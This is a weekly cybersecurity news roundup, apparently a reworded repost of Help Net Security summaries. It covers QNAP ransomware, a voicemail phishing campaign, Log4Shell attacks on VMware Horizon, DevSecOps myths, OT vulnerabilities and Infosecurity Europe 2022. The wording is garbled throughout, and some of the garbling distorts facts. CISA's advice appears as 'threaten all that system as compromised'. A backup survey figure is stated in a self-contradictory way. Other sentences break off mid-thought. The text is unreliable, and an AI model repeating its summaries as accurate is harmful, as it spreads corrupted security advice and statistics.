Review week: Log4Shell exploitation, DevSecOps myths, 56 vulnerabilities affecting OT devices


Here is an overview of some of the most interesting news, articles, interviews and videos last week:

QNAP NAS devices hit by DeadBolt and ech0raix ransomware
Taiwan-based QNAP Systems is warning consumers and organizations using their network-attached storage (NAS) appliances of a new DeadBolt ransomware campaign.

Fake voicemail notifications are after Office365, Outlook credentials
A phishing campaign that uses fake voicemail notifications targets and still targets various U.S.-based organizations, in an attempt to obtain employees ’Office365 and Outlook login credentials. , warned Zscaler.

Attackers are still exploiting Log4Shell on VMware Horizon servers, CISA warns
If your organization runs VMware Horizon and Unified Access Gateway servers and you have not yet implemented patches or workarounds to fix/reduce the Log4Shell vulnerability (CVE-2021-44228) by December 2021, you should threaten all that system as compromised, The Cybersecurity and Infrastructure Security Agency (CISA) advised on Thursday.

Board members and the C-suite need secure communication tools
Board members and the C-suite are prime targets for cyber-threat actors, due to their access to highly sensitive information. However, too many of them are putting their organizations in a detrimental way with the daily use of personal email to communicate on sensitive topics.

After being breached once, many companies are likely to be hit again
Cymulate announced the results of a survey, showing that two-thirds of companies hit by cybercrime last year were hit more than once, with nearly 10% experiencing 10 or more attacks. in one year.

How the blurring of the “supply chain” opens your doors to attackers — and how you can close them
There have been more than 200 targeted supply chain attacks in the past decade. Some of these campaigns have affected countless supplier networks and millions of customers – SolarWinds, Kaseya and the recent Log4j debacle are thought to be.

The price of stolen information: Everything is sold on the dark web
Privacy Affairs researchers concluded that criminals using the dark web only had to spend $ 1,115 for the complete set of a person’s account details, allowing them to create fake IDs and fake accounts. private documents, such as passports and driver’s licenses.

7 myths of DevSecOps and how to overcome them
By integrating security processes and following end-to-end automation, businesses can secure software throughout the software supply chain, significantly improve the developer experience, and accelerate safer delivery. To achieve this, businesses need to transcend the seven common myths of DevSecOps that prevent them from making change.

How to keep your NFTs safe from scammers
According to Wikipedia, the first known non fungible token (NFT) was created in 2014 and the first NFT project was launched in late 2015. It took several years and more projects for the concept to trickle into the consciousness of the general public, and then a few more for large investments in NFTs to follow.

How to properly use and manage Kubernetes in production
In this video for Help Net Security, Alex Jones, Director of Kubernetes Engineering at Canonical, talks about the proper use and management of Kubernetes in production.

Automotive hose manufacturer hit by ransomware, shut down production control system
A U.S. subsidiary of Nichirin Co., a Japan-based company that makes and sells automotive hoses and hose parts, was hit by ransomware, resulting in the closure of the subsidiary’s network and production control system.

Data recovery depends on how good your backup strategy is
99% of surveyed IT decision makers say they have backup strategies in place, but only 26% admit that they do not fully restore all data/documents when recovering from a backup, according to an annual survey conducted in April 2022 by Apricorn.

The researchers revealed 56 vulnerabilities affecting thousands of OT devices
In this video for Help Net Security, Daniel dos Santos, Head of Security Research, Forescout, mentions about 56 vulnerabilities, affecting ten vendors, including Bently Nevada, Emerson, Honeywell, JTEKT, Motorola, Omron , Phoenix Contact, Siemens, and Yokogawa.

The solution to the cybersecurity skills gap largely depends on hiring skills.
(ISC) ² has published findings from its 2022 Cybersecurity Hiring Managers research that shed light on best practices for recruiting, hiring and onboarding entry- and junior-level cybersecurity practitioners.

Within a large-scale phishing campaign targeting millions of Facebook users
In this video for Help Net Security, Nick Ascoli, VP of Threat Research, PIXM, discusses a massive phishing campaign that successfully stole an estimated five million Facebook accounts.

What are the benefits of no password authentication?
In this video for Help Net Security, Christofer Hoff, Chief Secure Technology Officer at LastPass, talks about the benefits of no password authentication.

iPaaS: The latest enterprise cybersecurity risk?
In this video for Help Net Security, Alon Jackson, CEO of Astrix Security, talks about how as different third-party platforms proliferate, and as data linking becomes easier and workflows with each other, it’s time for cybersecurity solutions to keep pace.

Webinar: What is trending in email security?
In this webcast Sarah Happé, Echoworx’s Director Client Engagement, and Forrester’s Senior Analyst Jess Burn, dive into how security leaders use email security to challenge the status quo and build customer trust and business revenue .

Photos: Infosecurity Europe 2022, part 1
Infosecurity Europe 2022 has now opened its doors to ExCeL in London. Here’s a look at the event, the featured vendors are: Arctic Wolf Networks, Bridewell, Checkmarx, Cisco, CrowdStrike, Cybereason, Hornetsecurity, (ISC) ², Mimecast, Netskope, OneTrust, and Splunk.

Photos: Infosecurity Europe 2022, part 2
It’s the second day of Infosecurity Europe 2022 at ExCeL in London. Here’s a look at the event, the vendors featured are: Akamai, SecurityScorecard, Edgescan, ManageEngine, Securonix, F5, ServiceNow, and Vade.

Infosecurity Europe 2022 video walkthrough
Infosecurity Europe 2022 has now opened its doors at ExCeL in London, here’s a look inside the event.

New infosec products of the week: June 24, 2022
Here’s a look at the most interesting products from last week, featuring releases from Arcserve, Cavelo, ComplyCube, CompoSecure, and Hillstone Networks.

#Review #week #Log4Shell #exploitation #DevSecOps #myths #vulnerabilities #affecting #devices #Source Link #Review week: Log4Shell exploitation, DevSecOps myths, 56 vulnerabilities affecting OT devices

Leave a Comment